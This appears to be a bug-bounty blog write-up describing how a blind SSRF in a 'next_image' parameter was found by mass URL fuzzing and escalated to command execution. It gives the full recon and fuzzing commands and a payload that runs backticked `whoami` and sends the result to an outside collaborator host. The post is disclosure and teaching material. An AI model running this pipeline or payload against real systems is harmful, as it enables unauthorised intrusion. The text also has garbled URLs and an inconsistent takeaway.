Chaining an Blind SSRF bug to Get an RCE

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be Discussing how I was able to get RCE by using Blind SSRF.

TOOLS used for the exploitation:

  1. gf (tomnomnom) — https://github.com/tomnomnom/gf
  2. qsreplace(tomnomnom) — https://github.com/tomnomnom/qsreplace)
  3. ffuf — https://github.com/ffuf/ffuf
  4. gau(Corben) — https://github.com/lc/gau
  5. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls

Background of the Vulnerability:

I always wonder why great bugbounty hunter always tell about chaining the bug. I was doing some recon on target using web achieve I found an blind ssrf on targets with parameter named as “next_image” .

NOW the actual Hunting start:

So, Suppose the target name is example.com and also all subdomain are in scope.Like this

In Scope: *.example.com

While doing some recon on target using web achieve, I extracting all the urls from web achieve using waybackurls and gau . Here is command i used for that

Command used:

gau -subs example.com

waybackurls example.com

But still there is a chance that will will missing some url. So, inorder to reduce the chances for the missing url we run waybackurls on all subdomain. And grep out all the urls containing parameters and sort them uniquely and save it in file. So that can fuzzing for blind ssrf

Command used:

gau -subs example.com; subfinder -d example.com -silent |waybackurls | gf ssrf | sort -u >> testblindssrf.txt

After greping and sorting the url we saved it in a file named as “testblindssrf.txt”. Now we fuzz the url for blind ssrf using ffuf.

So for receiving the http request for blind ssrf i have used my burp collaborator . But testblindssrf.txt file have 900 url so, i used qsreplace to replace all parameter value with burpcollaborator server payload and fuzz it with ffuf.

.Command used:

cat testblindssrf.txt | qsreplace “http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net" >> ssrfuzz.txt

ffuf -c -w ssrfuzz.txt -u FUZZ -t 200

Now we will check whetherwe get any http request hit on our burp collaborator server. Fortunately i got an httpx hit on my burp server by the urls as

Vulnerable url:

http:/devtest.exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net

Now it time to escalate blind ssrf to RCE:

As I was thing about how can escalate these blind ssrf sudden i remember as post of twitter i can’t remember the name of the user who posted the tips but I tried the payloads to check rce.

payload was:

http:/devtest.exampl.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net?`whoami`

Once , when i open the link on my browser i got an http request on my burp server with “whoami” rce command being a executed as show in image.

POC for Blind ssrf to rce

I quickly reported the bug and the report by triage to critical

After seeing this my reaction …

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach to access admin dashboard , and i have reported many in bugbounty program using this process, .I hope this will help to find more admin Dashboard takeover

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability..

Like to hack and break security code and denfense

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store